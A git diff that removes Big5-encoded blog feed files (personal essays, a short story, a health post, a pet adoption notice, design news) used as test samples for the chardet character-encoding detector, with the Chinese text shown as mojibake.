    diff --git a/chardet/tests/Big5/linyijen.blogspot.com.xml b/chardet/tests/Big5/linyijen.blogspot.com.xml deleted file mode 100644 index 99eecd9..0000000 --- a/chardet/tests/Big5/linyijen.blogspot.com.xml +++ /dev/null @@ -1,178 +0,0 @@ - - - - - - -C'est La Vie! -Carpe Diem! The records of beautiful solitude life.. - -tag:blogger.com,1999:blog-9658124 -2005-12-28T03:09:08Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Yijen - -2005-12-26T20:32:00+08:00 -2005-12-26T12:59:03Z -2005-12-26T12:44:38Z - -tag:blogger.com,1999:blog-9658124.post-113560107864186141 -µu¾v«NִR - -
    - - - ¡@¡@±q2004¦~×÷7₪כ₪§«ב¦A₪]¨S¦³₪j´T­׳°ֵ¹LְY¾v¡C₪£¹L₪W₪W¶g¹ן©ף¯d₪F₪@¦~¦h×÷×ר¾v·P¨ל«D±`¹½·׀¡A©ׂ¥H¦b¬Y­׃₪ס¸¦­₪U¯Z×÷±₪W¡A²@₪£µS¿¦a¬D₪F®a«ׁ₪f³ּ«K©y×÷¾v´Y¡A¶ָ×ב350₪¸×÷¥N»ש¥[₪W¥בµ¹³]­p®v₪@¥y¡uְH«K¡v¡A´N§גְY¾vµ¹°ֵ₪F¡C
    -
    ¡@¡@§·Q¦₪vֱ¬O¾A¦XµuְY¾v×÷¡A¦₪ײֵ‎₪H¬°_¨׃«W¸¨¡Bֲ²¼ה¡B©ת§ײ¡C·Q§ֲֻI³y«¬¡H¦­₪W¬~­׃ְY§j°®«בְH«K©­׃µw¾vֳ¾´N¯א¥X×ש¡Cֳi´k×÷¸¡A´N³»µ₪@ְY²M´צ±¾ִׁ©M₪j²´ֳט¡A₪H®a₪]₪£·|ִ±±o¾ַ¥ֽ¼ֻ₪׃ֱV¡A×ר¾v₪S¶ֳ¨÷´N«¥i©ָ₪F¡C
    -
    ֱ`¦׃¨¥₪§¡A³o¬O₪@½g¬¯ִ£₪ו¡C
    -
    ¬¨ל§O₪H×¾¾ו§¦~¬צ«ב¿e¥״µ²¦×÷×ם±¡¡A¯u¦³½ל¡C
    -
    «¢«¢«¢«¢«¢¡C
    -
    -false -
    - - - -Yijen - -2005-12-05T23:12:00+08:00 -2005-12-09T09:54:30Z -2005-12-05T15:24:19Z - -tag:blogger.com,1999:blog-9658124.post-113379625909019162 -II - -
    «ױ«ױ¦R₪F₪f®נ¡A©g®R×÷²´¯«ֲא¦׃ִֶ©¿¡C
    -
    ¡u¨÷¨א¦³§¥¼³÷×÷¹·Q¡C¡v
    -
    §°¾µְYµ¥₪F¥b₪ְֱִ¡A©g®R©l²׳¨S¦A¦h»¡¥b¥y¡C
    -
    ¡y....¡z
    -
    §²׳©ף¦A₪]«צ±ּ₪£¦ם¡C
    -
    ¡y₪°»ע¡H¡z
    -
    ©g®R¯÷¯÷¦a·n₪F·n¦o₪@ְY¶ֳ¾v¡C
    -
    ¡u¦‎¬O¬¨׃³o±o¥ֳ»·¦¨¬°₪@­׃¿ע¾ׁ₪F¡C¡v
    -
    ¡y¬°₪°»ע¡H¡z
    -
    ¡u§A×¾¹D₪@¥y©װ₪B₪ו "Carpe Diem!" ¶¡H¡v
    -
    ¡y₪£×¾¹D§¦³¨S¦³°O¿ש¡A₪j·§¬O₪ש¨ט§Y¥ֳ«ם×÷·N«ה§a¡H¡z
    -
    ¡u¶ג¡A§A¨C₪ׁ©־³\³£¿ש¹L¬ִR×÷₪i¶§¡C¦‎¬O´N¦b¨÷₪@₪ׁ×÷¨÷₪@¨ט¡A§A¿ש¹L×÷₪£¶ָ¶ָ¬O¨C₪ׁ¨£¨ל×÷₪i¶§¡Aֱ¿ש¹L₪F¦¹¥ֽ₪@¦¸×÷¥ֳ«ם¡C¡v
    -
    ¡y§₪£ְ´¡C¡z
    -
    ¡u·ם₪U§₪]₪£ְ´¡A¦‎¬O²{¦b§¾ו±o₪F¡C¡v
    -
    *To be continue..*
    -
    -false -
    - - - -Yijen - -2005-11-29T20:25:00+08:00 -2005-12-27T14:55:44Z -2005-11-29T13:25:09Z - -tag:blogger.com,1999:blog-9658124.post-113327070934898847 -I - -
    ֵוִ±©g®R×÷µd¿פ¡A¬O±q¦o²´¨₪×÷₪@÷w²´²\¶}©l¡C
    -
    ³ב¡A¹ן₪F¡C§¬O³o®aֲו°|´׃׫₪H¯f©׀×÷¸q₪u¡A¦׃©g®R´N¬O§­t³d¬ֵ@×÷¨ה₪₪₪@¦ל¯f₪H¡C
    -
    ©g®R¬O«ח»ע¶i¨׃×÷¡A¦ׁ¹ך»¡§¨ֳ₪£²M·¡¡C¦‎¬O¨C¨C¬µ¦o¥ת¼ה×÷¥ײ½§»P¯ֲ¯u×÷÷־ֱy¡A§ֱ`§װ₪£¦ם¦n©_³o¼ֻ₪@­׃₪k«ִ«ח»ע·|´N¦¹¨I÷־¡C©g®R₪£³»¬¡A¦³µֲ׳÷¡×÷ֳBְY¡BֳZ³J«¬×÷ֱyֳe¡Bµy¶¦y¾U×÷¬¦tֱ¦³₪p¦׃®¼×÷»ף°©¡C¦׃¨I÷־®ֹ·L·L¹°_×÷ֱ¡®B«h¥R₪ְ»¡©ת₪F¦o­׃©₪₪ֱפ§t×÷­ֿ±j¡C
    -
    ֱ`¦׃¨¥₪§¡A¦b¬Y₪ׁ¨ׂ¦ז×÷ֲ½¨­©ח­Iµ²§פ¡A₪ֿ₪גְ¿¹L¦oֱyֳe×÷₪@÷w²´²\₪§«ב¡A§¿ש´j¦a²r«צµ§ֳֹה×÷÷ע«ז©I¥s¹a¡G¡uֲו¥ֽ©O¡H©g®R¬y²´²\₪F¡I¡v
    -
    «¥i±₪¡A÷I¦ֲו¥ֲֽק¶}¬°₪מ¡A©g®R³£¨S¦³¿פ¹L¨׃¡Cֲו¥ֽ¶ָ¯ף¯ף¹ן§ֵס©J´X¥y¡A₪Sִ~ִע¥¼§¹¦¨×÷¨µ©׀₪u§@¡C¦׃§¡A«h¬נµM°{¹L₪@­׃±j¯P×÷©ְְY¡A¡u©g®R´N­n¿פ₪F¡I¡v¡A©ׂ¥H§¦bµ²§פ¨ׂ¦ז×÷¬ֵ@₪u§@«ב¡A₪S¦°¯d₪F₪U¨׃¡C
    -
    ¬O×÷¡A´N¦b·ם₪ׁ©]¸ּ¡A©g®R¿פ₪F¡C
    -
    ¡y¥©..¥©§J₪O..¥¬₪B..¡z³o¬Oµd¿פ«ב×÷©g®R©ׂ´£¥X×÷²ִ₪@­׃­n¨D¡C
    -
    ¡u¦³¨ֶ§´N±¾©w₪F¡I¡v¦‎¬O¦^ְY₪@¬©g®R¬ט¨D×÷²´¯«¡A§²@₪£¿נ÷ֳ¦a½ִ¥h¹j¾ְ×÷«K§Q°׃©±´ְ©g®R¶R₪F¨ג×M¥©§J₪O¥¬₪B¡C
    -
    ¦b¯T§]×ךֳ`¦a¸ׁ¨M¨ג×M¥¬₪B«ב¡A©g®R­±µL×ם±¡¦a»¡₪F₪@¥y¡u§÷־₪F¦n₪[¡B¦n₪[¡C·Q­n°O¦ם¦n¦h¦n¦h¡A°O¾׀«o¹³¬y¨F₪@¼ֻ¡A±q§×÷«ֱ_¶¡²@₪£µS¿×÷·ָ¨«¡v¡C
    -
    *To be continue...*
    -
    -false -
    - - - -Yijen - -2005-11-23T11:57:00+08:00 -2005-11-23T04:58:13Z -2005-11-23T04:01:30Z - -tag:blogger.com,1999:blog-9658124.post-113271849025109532 -₪k«ִ₪d¸U₪£­n»´©¿¸gµh¡I - -
    ¬Q₪ׁ¥h¥_ֲו¬ֲו¥ֽ±o¨ל₪@¨ַ₪±o¡C
    -
    ₪k¥ֽ₪@©w­n×`·N¦₪v¨­ֵי×÷ֵ₪ֶ¡A¨k¥ֽ₪]­nְ°₪k×B₪ֽ×`·N³ב¡C₪µ¦~9₪כ¥ק§ֱ¦b«e₪@­׃₪½¥q¡A³Q¬£¥h₪י¥»¥X®t±ִ³XTGS¡A¨÷­׃₪כ§×÷¸g´ֱ×ר¹F20¦h₪ׁ¡]±q4,5¸¹₪@×½¨ל25,26¸¹¡^¡A¥i¬O§¨S¦³«×`·N¡A¥H¬°¬O³ז¯ֲ×÷·f­¸¾ק¥X®t₪׃²ײ¡C
    -
    ¹j₪F₪@­׃₪כ¡A¨ל10₪כ©³§´N¸g¾ת₪H¥ֽ­÷«׳×÷¼@¯P¸gµh¡A¦׃¥B¬Oµh¨ל₪@×½¹ֳ¦R¡B¥‏¨­µs§N¦½¡]¦ח×Aְד¨ל·|÷w₪פ×÷¨÷÷״¡^¡B©I§l§xֳר¡Bµר½u₪£²M¡B·Nֳׁ¼ׂ½k¡A¨ל³ּ«ב×½±µ©°g¡A¨÷®ֹ§₪H¥¿¦n¥h₪½ֳצ₪½¥q«פ³X´X­׃×B₪ֽ¡Aֱ³Q±ֵֿ@¨®°e¥h₪¯·Rֲו°|¡C
    -
    ֲו¥ֵֽח¦ו¡Bֵח§¿¡A₪]·׃₪F¸¡³¡¶W­µ×i¡A¦‎¬O×ל¨B¶Eֲ_¨ֳ¨S¦³µo²{½T₪ֱ×÷­ל¦]¡A©ׂ¥H¥u¦n¥H¥´₪מµh°w×÷₪ט¦¡׃V½w§·ם®ֹ×÷¯kµh¯g׬¡A§÷ע±i₪¼₪¼×÷°ֲו¥ֽ¡A¨÷₪U­׃₪כ§ ֱ·|₪£·|³o¼ֻµh©¡H²¦³÷¥ֽ¥­±q¨׃¨S¦³¦]¬°¸gµh³o»ע¯T¯V¹L¡Aֲו¥ֽ¥u²H²H×÷»¡¡A¥ׁ©ף¨S¦³«e¨ׂ¡A¥L₪]¨S¦³¿ל×k«Oֳׂ¡A¦p×G₪U­׃₪כֱ¬Oµh©¡A¨÷§­ּ¦A¨׃¬ד¨s½T¹ך­ל ¦]¡Aֲו¥ֽ×÷³oµf»¡×k·ם¯u§ג§ְ~¥X₪@¨­§N¦½¡C
    -
    ³o¬q´ֱ¶¡§₪]¦]¬°«שִע₪ײ¶q¥X¦ו¡A₪S¶]¥h₪½«O₪j¼׃¡]³g¹ֿ100₪¸×÷«K©y¶Eְר¶O¡^¬ֲו¥ֽ¡A¦‎¬Oֲו¥ֽ¶Eְר ¹Lµ{«¯ף²v¡A©~µM¶}₪מµh₪מ¦וֳִ´N¥´µo¯f₪H¨«¡C§»¡§·Q×¾¹D¯kµh×÷­ל¦]¡Aֲו¥ֱֽ»¡¡u«u°¡A₪£¥־°ױ¡A₪£¥X¦ו¡B₪£µh₪£´N¦n₪F¶¡H¡v¡u¥־₪÷µרֳט·|¦³¬ֽ³ב¡I¡v¦b§§ ִ³₪§«ב¡Aֲו¥ֽ₪~§ן₪f»¡¡u§A½T©w¶¡H·Q×¾¹D­ל¦]§­ּ´N¨׃·׃°..¡v©_©ַ₪F¡A§¥H¬°§ה¥X¯f¦]¬Oֲו¥ֽ×÷₪u§@₪§₪@¡C
    -
    ֱ`¦׃¨¥₪§¡A§¬Q₪ׁ¥h¥_ֲו¬ֲו¥ֽ¡C²׳©ף¦³₪@­׃ֲו¥ִֽ@·Nֵ¥§»¡§¹©ׂ¦³×÷¯g׬¡A¨ֳ¥B°µ₪F©₪ש¡Bֵח¦ו¡B₪÷¶E ¶W­µ×iµ¥µ¥µ¥×÷¶i₪@¨B¶Eְר¡AµM«ב¦b¶W­µ×i®ֹ¡Aµo²{­ל¨׃¦b₪l®c¾ְ₪W×ר₪F₪@ֱ×F¦ט¡Cֲו¥ֽ»¡¥ׁ©ף§×÷¥ֽ²z÷c³y₪§¬G¡A¦o₪ס¸¶ֹ¦V§Pֲ_³o­׃×F¦ט¬O¡u¥©§J₪Oֵn¸~¡v¡A₪£¹L¶i₪@¨B×÷µ²×Gֱ¬O­n¦bְֵֻח₪§«ב₪~×¾¹D¡C
    -
    ©ׂ¥H¡A¨S¦³¥פ¦ף₪£µ־×A¬OµL½tµL¬G×÷¡A₪j®a₪]₪£­n»´©צ©¿²₪¨­ֵי¶ַ¨׃×÷ִµ°T³ב¡C₪׳¨ה¦³¸gµh×÷¦U¦ל₪k©¦P­M¡A§O§ׁ₪F¦h·R¦₪v₪@ֲIֲI¡A¥hֲו°|¹‎©³×÷ְֻ¬d₪@¦¸§a¡C
    -
    §ֶ±ז₪j®a³£°·±d¥­¦w¡C
    -
    -false -
    - - - -Yijen - -2005-11-20T15:11:00+08:00 -2005-11-20T07:29:32Z -2005-11-20T07:29:32Z - -tag:blogger.com,1999:blog-9658124.post-113247177222255482 -[¥N] ·R₪°e¾i¡A₪p×ב¿¡C - -
    - - - -
    ³o¬O¥H«e¦P¨ֶ×÷¬ד¨s©ׂ¦P¾ַ¾¨׃×÷₪p×ב¿¨א¡A
    ¦³¿³½ל×÷×B₪ֽ­ּ¥i¥H°ׁ¦ׂ₪U­±×÷¸ך°T»P¿₪₪³~
    ³sµ¸¡A₪p¿«}»­n§ה­׃¦³·R₪×÷¦n¥D₪H³ב¡C
    ---
    http://www.wretch.cc/album/album.php?id=staceyma&book=13

    §²׳©ףְ°³o°¦₪p¿«}©ח₪@¨t¦C×÷·׃₪ש
    ´N¬O´X­׃ֲ§«פ«e¾¨ל×÷ ¬ש1₪½₪ח ¥ױ¦ג°ֲׁר¦ַ¶ֲ¦ג×÷₪½¿
    ¦]¬°®a₪₪₪w¦³₪j¿₪@°¦ ¨ג­׃·|¥´¬[ ©ׂ¥H₪£₪ט«K¦A¾i
    ³o°¦₪p×÷«¬¡¼ג¥i·R¹³µU₪l ·|¸ץ¨׃¸ץ¥h×±¿ֱ¡²
    §±Nֳ״°e»{¾i×ּ³r¿´־₪@×K ¦]¬°¥L¶W·R×±£x
    ¦p×G¦U¦ל₪£₪ט«K»ג¾i ½׀ְ°§ֲא±H¦n¶
    ¦³·Nִ@¬¿×÷₪H½׀¸ע§ֱpµ¸ ֱֱֲֲ
    stacey0506@yahoo.com.tw (02)23656579
    -
    -false -
    - - - -Yijen - -2005-11-16T09:55:00+08:00 -2005-11-16T01:57:15Z -2005-11-16T01:57:15Z - -tag:blogger.com,1999:blog-9658124.post-113210623543932404 -¥[×o - -
    ²׳¨s­n¦¨¬°©µ´±µ¨÷§פ×÷ֶF»מ¡C
    -
    §ֶ±ז¯א°ק¥ֳ»·×ֳ«ש₪ֿ°©×÷÷כ¯«¡B¬yµ«q°f×÷¦ו²G¡C
    -
    ֱ¦³¡A₪£­n§ׁ°O¡C
    -
    ¬°¦₪v¦¨´N₪@³ץ¥ֳ»·°l¨D¦§­²©R×÷₪H¥ֽ¡C
    -
    -false -
    - - - -Yijen - -2005-11-09T11:56:00+08:00 -2005-11-09T04:19:12Z -2005-11-09T04:00:45Z - -tag:blogger.com,1999:blog-9658124.post-113150884550573195 -Don't worry, ok? - -
    »­n¾ב₪¶¡H
    -
    §A»¡×÷§³£¬«H¡A§Aµ¹×÷§³£³ֵw¡C
    §A±a§¥h×÷´N¬O₪ׁ°ף¡A©M§A¦b₪@°_´N¥s©¯÷ײ¡C
    -
    ·|¶V¨׃¶V¦n×÷¡C
    -
    -false -
    -
    diff --git a/chardet/tests/Big5/marilynwu.blogspot.com.xml b/chardet/tests/Big5/marilynwu.blogspot.com.xml deleted file mode 100644 index 39b6362..0000000 --- a/chardet/tests/Big5/marilynwu.blogspot.com.xml +++ /dev/null @@ -1,103 +0,0 @@ - - - - - - -°¨₪O½¬ֳת - - -tag:blogger.com,1999:blog-9405669 -2005-11-12T17:03:26Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -°¨₪O½¬ֳת - -2005-11-13T01:00:00+08:00 -2005-11-12T17:03:25Z -2005-11-12T17:03:11Z - -tag:blogger.com,1999:blog-9405669.post-113181499151010459 -¥»₪H²{¥פ­÷®u°¸¹³¡C -<img src="http://photos1.blogger.com/blogger/5458/683/1600/MM.jpg"> -false - - - - -°¨₪O½¬ֳת - -2005-10-31T17:26:00+08:00 -2005-10-31T09:29:15Z -2005-10-31T09:29:15Z - -tag:blogger.com,1999:blog-9405669.post-113075095591521093 -Lalala - -
    - - - -
    ¾ד±i·׃₪ש×÷³ּ₪j¯ֲI³Q§µפ±¼₪F«¢«¢«¢«¢¡C
    ·s¹u₪lֱ¬O₪ֱ¨ל₪F₪@ֲIֲI₪£¹L·N«ה¨ל₪F´N¦n§a...
    -
    -false -
    - - - -°¨₪O½¬ֳת - -2005-10-25T19:58:00+08:00 -2005-10-25T12:03:46Z -2005-10-25T12:03:46Z - -tag:blogger.com,1999:blog-9405669.post-113024182696299540 -₪p«C¨׃₪F¡ד₪p«C¨׃¨£¥ױ®Q®Q₪F¡ד¡ד¡ד - -
    ₪p«C¸ּ­±¸ֻ×÷¬O₪§«eNicolas×÷µw÷׀¡ד
    - - - -
    -
    - - - -
    -
    - - - -
    -
    - - - -
    -
    -false -
    - - - -°¨₪O½¬ֳת - -2005-10-21T22:23:00+08:00 -2005-10-21T14:28:25Z -2005-10-21T14:28:25Z - -tag:blogger.com,1999:blog-9405669.post-112990490520014452 -­ט­ט°µ×÷¡A®¼¦n¥־¡C -<img src="http://photos1.blogger.com/blogger/5458/683/1600/IMG_23481.JPG"> -false - -
    diff --git a/chardet/tests/Big5/myblog.pchome.com.tw.xml b/chardet/tests/Big5/myblog.pchome.com.tw.xml deleted file mode 100644 index 2e119c3..0000000 --- a/chardet/tests/Big5/myblog.pchome.com.tw.xml +++ /dev/null @@ -1,52 +0,0 @@ - - - - -<![CDATA[ Remember God ]]> -zh-tw -http://myblog.pchome.com.tw/remembergod/ - - -<![CDATA[·R₪O¯u¥¿×÷·½ְY]]> - -http://myblog.pchome.com.tw/_/myblog/?blog_id=remembergod&y=2005&m=08&an=1327&acn=140 - -Thu, 11 Aug 2005 08:01:46 GMT - - - -<![CDATA[¶W¥@¬ֹ×÷ְר×k]]> - -http://myblog.pchome.com.tw/_/myblog/?blog_id=remembergod&y=2005&m=07&an=813&acn=140 - -Fri, 29 Jul 2005 05:07:20 GMT - - - -<![CDATA[®i²{¦₪v§¹¬×÷­·½d¡A¦¨¬°¬¦n×÷­׳¦ז₪H]]> - -http://myblog.pchome.com.tw/_/myblog/?blog_id=remembergod&y=2005&m=07&an=402&acn=140 - -Fri, 15 Jul 2005 06:03:02 GMT - - - -<![CDATA[­C¿q₪]¶ַ±ֲֶ[­µ×k×ש¨ֳ´£­ׂ¯ְ­¹]]> - -http://myblog.pchome.com.tw/_/myblog/?blog_id=remembergod&y=2005&m=07&an=234&acn=140 - -Fri, 08 Jul 2005 23:58:43 GMT - - - -<![CDATA[ִb®¬×÷°½ְn¸י]]> - -http://myblog.pchome.com.tw/_/myblog/?blog_id=remembergod&y=2005&m=07&an=163&acn=140 - -Wed, 06 Jul 2005 06:13:20 GMT - - - diff --git a/chardet/tests/Big5/oui-design.com.xml b/chardet/tests/Big5/oui-design.com.xml deleted file mode 100644 index 360523c..0000000 --- a/chardet/tests/Big5/oui-design.com.xml +++ /dev/null @@ -1,76 +0,0 @@ - - - - - Oui-Design Lounge ¨Fµo·s»D¼s¼½ - http://www.oui-design.com - Design.Life.Passion - zh-TW - - -÷פ¯¸§ף·s₪½§i -oui-design -05/20 7:03 am -http://www.oui-design.com/fpcode/news.php?story_id=268 - - -Africa Remix -oui-design -02/01 7:38 am -http://www.oui-design.com/fpcode/news.php?story_id=267 - - -Fashion Untamed -oui-design -01/30 6:37 am -http://www.oui-design.com/fpcode/news.php?story_id=266 - - -¦ט¯Z₪ת°¨¼w¨½3₪j³ױ׫ְ]ֱp₪ג§ן³y -oui-design -01/29 4:26 am -http://www.oui-design.com/fpcode/news.php?story_id=265 - - -¡uְN÷¸×÷²¾°«°³ש¡v°µe¸ֻ¸mְֳ³N®i -oui-design -01/27 5:32 pm -http://www.oui-design.com/fpcode/news.php?story_id=264 - - -YOU ARE HERE - THE DESIGN OF INFORMATION -oui-design -01/17 6:26 pm -http://www.oui-design.com/fpcode/news.php?story_id=263 - - -¡u²ִ₪­₪Q₪@©¡«ֲ¥§´µֲש¦~®i¥xֶWְ]¡v÷V©w®iִ‎µ¦µe®׳ -oui-design -01/17 6:23 pm -http://www.oui-design.com/fpcode/news.php?story_id=262 - - -¼ײ³z - ¥i¨£»P₪£¥i¨£®i -oui-design -01/17 6:21 pm -http://www.oui-design.com/fpcode/news.php?story_id=261 - - -Architecture Foundation Building ¨M¿ן§@«~ -oui-design -01/14 9:11 am -http://www.oui-design.com/fpcode/news.php?story_id=260 - - -Mac mini -oui-design -01/11 2:27 pm -http://www.oui-design.com/fpcode/news.php?story_id=259 - - - - - diff --git a/chardet/tests/Big5/sanwenji.blogspot.com.xml b/chardet/tests/Big5/sanwenji.blogspot.com.xml deleted file mode 100644 index 951828a..0000000 --- a/chardet/tests/Big5/sanwenji.blogspot.com.xml +++ /dev/null @@ -1,1075 +0,0 @@ - - - - - - -San Wen Ji ´²₪ו¶° -´²₪ו¶°°O¸₪F§₪י±`¥ֽ¬¡₪₪×÷©ׂ¨£©ׂ·P©M§×÷₪ֶF§כ®g¡CSanwenji ¬O´²₪ו¶°×÷´¶³q¸«ק­µ¼g×k(³o¸ּ¬₪Fֱn½ױ)¡C - -tag:blogger.com,1999:blog-5945336 -2005-12-30T13:33:27Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -San Wen Ji - -2005-12-30T21:30:00+08:00 -2005-12-30T13:33:27Z -2005-12-30T13:33:27Z - -tag:blogger.com,1999:blog-5945336.post-113594960731649004 -°eµ¹¦₪v×÷ - -
    - - - -
    ₪£¬O₪׃÷}«G×÷×ב¡A₪£¹L§³ֵw¨÷¬ץ¦ג¡C±N¥¦°eµ¹¦₪v¡A¬°¨׃¦~¼W²K®נ¦ג¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-30T18:49:00+08:00 -2005-12-30T10:51:00Z -2005-12-30T10:51:00Z - -tag:blogger.com,1999:blog-5945336.post-113593986051869919 -¶R₪½¥J - -
    ¦o­ּ¶R₪½¥J¶R±o«¶}₪¡A§¨S¶R¡C₪£¬O§₪£³ֵw¨÷¨ַ₪½¥J¡A₪]₪£¬O§§[¶¡A´N¬O₪£·Q¶R¡C¶R×÷¹Lµ{«°×¿³¡A¦‎¬O·ם§¬¨ל®a¸ּ×÷×F¦ט¶V¨׃¶V¦h×÷®ֹ­װ¡]§¬O₪@­׃₪£³ֵw§גֲֲ׫©±¼×÷₪H¡^¡A§·|·P¨ל·׀´e¡C©ף¬O¡A±©¦³₪£¶R¡C
    -
    ¬µ§O₪H°×°×¿³¿³×÷®³µ¦₪v¶R¦^¨׃×÷×F¦ט¡A§₪]³Q·P¬V₪F¡C¨ה¹ך¡A­n¨ֹ¨ֱ׫×÷¼ײ½ל¡A¨ֳ₪£»­n¦₪v¶R×÷¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-30T18:36:00+08:00 -2005-12-30T10:37:27Z -2005-12-30T10:37:27Z - -tag:blogger.com,1999:blog-5945336.post-113593904788854426 -±y¶¢×÷₪@₪ׁ - -
    ³}³}µף¡A¦Y¹״¥q¡A³©@°״¡A½ֽ½ֽ₪ׁ¡A«¼g·N¡A«±y¶¢¡C
    -
    ₪£¹L³Q§­ּ¨ג­׃₪k₪l¼f°×÷¨k₪h¥i¯א´N₪£¹³§­ּ¼g·N₪F¡C¼H¼H¡I
    -
    -false -
    - - - -San Wen Ji - -2005-12-30T10:31:00+08:00 -2005-12-30T02:31:40Z -2005-12-30T02:31:40Z - -tag:blogger.com,1999:blog-5945336.post-113590990066302710 -₪ׁ®נ - -
    ₪U«B₪F¡C¦n¹³«₪[₪]¨S¦³₪U¹L«B¡C«ח»ע¦n¹³¦³ֲI¬K·N¦×÷¡H₪µ₪ׁ­n³}µף°¡I₪@°}₪l«B­n°±°¡I
    -
    -false -
    - - - -San Wen Ji - -2005-12-30T10:17:00+08:00 -2005-12-30T02:20:06Z -2005-12-30T02:18:16Z - -tag:blogger.com,1999:blog-5945336.post-113590909628232643 -½׀«O«שְפ¹ׂ²M¼ה - -
    ¬¨ל¦³₪T­׃¯d¨¥¡Aְ³¸׃¬O¦P₪@­׃₪H©ׂ¬°¡A¨ה₪₪¨ג­׃¬O¦ֳ¨¥ֲ©»y¨׃×÷¡C¨ה¹ך¨÷­׃₪H×÷₪₪₪וְ³¸׃ֱ¦n¡A₪]¦³ֲI«ה·Q¡A¥u¬O¥־µ₪£·ם¡C©ף¬O¨S¦³¿ן¾×÷±¡×p₪U¡A§§ג¯d¨¥§R°£₪F¡C
    -
    ³o¸ּ¬O₪@­׃ְפ¹ׂ²M¼ה×÷¦a₪ט¡Aֱֱֲֲ₪j®a¦X§@¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T22:08:00+08:00 -2005-12-29T14:10:08Z -2005-12-29T14:10:08Z - -tag:blogger.com,1999:blog-5945336.post-113586540891323462 -¼ֶ°¼ֶ - -
    ₪T₪Q₪@₪י₪£·|¦^®a¦Y¶÷¡A₪@₪י₪]₪£·|¦^®a¦Y¶÷¡A₪G₪י©O¡H§·Q¦^®a¦Y¶÷¡C¦b₪G¸¹¨£­±×÷×B₪ֽ¡A­n¸ע§A­ּ»¡ֱn¹ן₪£°_₪F¡A₪£·Q±±¦b¥~¦Y©O¡I
    -
    »¡¯u₪¸¡A¬O§¦³©ׂ¿ן¾¡A§·R₪@¨ַ¥O§µ־×A×÷²ױ¸s°¡I«ח¼ֻ₪~÷גµ־×A¡H§·R¯u©±¡×÷¬yֵS°¡I¸ֳD₪£¹ן¡A®ז®ז₪£₪J¡A«₪£µ־×A¡C
    -
    ³o¼ֻ¼g¡A¥i¯א±o¸o×B₪ֽ₪F¡C₪£¹L³o₪]¬O§×÷¯u₪¸¡C¬₪F₪£°×¿³×÷¡A§₪]¨S¦³¿ל×k¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T19:55:00+08:00 -2005-12-29T11:40:23Z -2004-12-28T14:56:30Z - -tag:blogger.com,1999:blog-5945336.post-110424579076052849 -₪H¥ֽ¶¥¬q - -
    ₪µ₪ִׁY¼F¦a©M¯ש©׀שj»¡×÷¸¡M¬O§×÷¸g¾ת¡C₪£¬O₪@¦¸¡M¦׃¬O«¦h¦¸¡M³£₪@₪@³Q§§J×A₪F¡C¬¦^§×÷©j©f¡M²{¦b¦o­ּ³£«¦n¡C¦p×G·ם¦~₪£¬O§×÷µw₪¸z¡M¨­W×÷¥i¯א¬O§­ּ¥‏®a₪H¡C
    **********************
    ₪£¬O₪°»ע¯S§O×÷»¡¸¡A³ֲּ²³ז₪£₪F×÷¡A¦‎¬O§­ֱּ`¬O¿ע§ׁ×÷¡Aֵ‎¥¦¯d₪U§a¡I
    -
    ×B₪ֽ¹ן§½ֶ­z₪@¨ַ¸¡A¸g¾ת¸ּ×÷¨C₪@¥ף¨ֶ±¡¡A³£¬O₪@­׃₪H¥ֽ×÷¶¥¬q¡C
    -
    §A¬§O₪H¦n¹³«©¯÷ײ¦×÷¡A¥L­ּ¥i¯א₪w¸g¾ת₪F¥L­ְּ³¦³×÷₪H¥ֽ¶¥¬q¡A©ׂ¥H·ם§A¬¨ל¥L­ּ×÷®ֹ­װ¡A¥L­ּ¥i¥H±q®e×÷¥h­±¹ן§A­±¹ן₪£₪F×÷¨ֶ±¡¡C§A₪£¥²C¼}¡A¦]¬°·ם§A₪]¨ל₪F¬Y₪@₪H¥ֽ¶¥¬q¡A§A₪]¥i¥H§@¬°§O₪H©ׂC¼}×÷¡C
    28 Dec 04
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T19:32:00+08:00 -2005-12-29T11:32:46Z -2004-12-29T15:51:56Z - -tag:blogger.com,1999:blog-5945336.post-110433551663928411 -µ¹₪Hµ־×A×÷·Pִ± - -
    ₪µ¦~¹J¨ל×÷°ֳD₪ס¥h¦~¦h¡M¥i¬O§«o¼ײ±o»´ֳP(¬¹ן¨׃»¡)¡C¬O§°µ¦n₪F₪²z·ַ³ֶ©M¦₪v¯u×÷¬¶}₪F¡C©ת¦~ֱ¶·§V₪O¡C
    ***********************
    ₪ֽ₪H§i¶D§¡A§¯אµ¹₪H₪@÷״µ־×A×÷·Pִ±¡C¹ן¡I×ס¨׃×÷§¡A¹ן¨ֶ±¡×÷¬×k¶}©l¯א¥־¥­±`₪¥h­±¹ן¡A¦]¬°×¾¹D×÷¶V¦h¡A«K₪£¥i¥H¨C¦¸°₪¡A§_«h®e©צ₪¶ֻ¡C¦P¨ֶ₪₪₪]µo¥ֽ₪F«¦h×÷¨ֶ±¡¡A¦³×÷¬O°·±d°ֳD¡A¦³×÷¬O·P±¡×÷°ֳD¡A¦³×÷¬O¦P¹±¶¡¬³B×÷°ֳD¡C₪G₪Q₪G­׃₪H¡A«K¦³³ּ₪ײ₪G₪Q₪G­׃°ֳD¡Aֱ¨S¦³­p÷ג§¦₪v¦b₪÷¡C¥H«e¡Aֱ`»{¬°¦₪v¦³¯א₪O¥h¸ׁ¨M©ׂ¦³×÷°ֳD¡A²{¦b¬O¶q₪O¦׃¬°¡A₪£¬O₪£ֳצ₪¡A¦׃¬OµL¯א¬°₪O¡A©ף¬O«K­n¦³©ׂ¿ן¾¡C
    29 Dec 04
    -
    -false -
    - - - -San Wen Ji - -2005-12-29T19:28:00+08:00 -2005-12-29T11:28:57Z -2005-12-29T11:28:57Z - -tag:blogger.com,1999:blog-5945336.post-113585573739482713 -¥h¦~₪µ₪י - -
    °O±o¬O₪°»ע×÷₪י₪l¶¡Sֱ°O±o×÷×B₪ֽ­ּ°¡T§i¶D§§a¡T
    -
    -false -
